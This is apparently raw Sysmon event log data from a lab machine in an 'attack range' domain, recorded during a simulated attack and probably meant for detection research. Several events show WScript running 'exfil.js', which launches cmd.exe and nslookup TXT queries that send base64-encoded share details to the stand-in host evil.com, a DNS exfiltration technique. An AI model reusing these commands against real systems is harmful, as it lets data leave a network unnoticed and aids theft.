Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9D36142045028ADFBEBDABE0AE47C996,SHA256=7EC53741DEA12CECEAA31AB90CBF0C9E687953AD8CE5AD7B1FB918216E492C0A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0E44-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-18E0-629A-6742-000000005F02}39762172C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-0E44-000000005F02}8108C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.448{2E1864BB-18EE-629A-0E44-000000005F02}8108C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfsbebz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.443{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nleubh.tmpMD5=C7EBA965EA2938C9D738B256A5573F35,SHA256=722A438985A6A7CB05BECB0E5BC6B8755AA777F6146D0E8D8A702198A5DDD2AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.412{2E1864BB-18EE-629A-0C44-000000005F02}6526928C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0D44-000000005F02}4616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.412{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0D44-000000005F02}4616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.412{2E1864BB-18EE-629A-0B44-000000005F02}6180924C:\Windows\system32\cmd.exe{2E1864BB-18EE-629A-0D44-000000005F02}4616C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.420{2E1864BB-18EE-629A-0D44-000000005F02}4616C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18EE-629A-0B44-000000005F02}6180C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleubh.tmp 2>&1 10341000x8000000000000000209942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.397{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0C44-000000005F02}652C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.397{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18EE-629A-0C44-000000005F02}652C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.397{2E1864BB-18EE-629A-0C44-000000005F02}6526928C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0B44-000000005F02}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.381{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0C44-000000005F02}652C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.380{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.380{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.380{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.379{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.379{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-18EE-629A-0B44-000000005F02}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.379{2E1864BB-18E0-629A-6742-000000005F02}39767904C:\Windows\System32\WScript.exe{2E1864BB-18EE-629A-0B44-000000005F02}6180C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.379{2E1864BB-18EE-629A-0B44-000000005F02}6180C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleubh.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.375{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljvukm.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.344{2E1864BB-18EE-629A-0944-000000005F02}60047568C:\Windows\system32\conhost.exe{2E1864BB-18EE-629A-0A44-000000005F02}3360C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:34.344{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 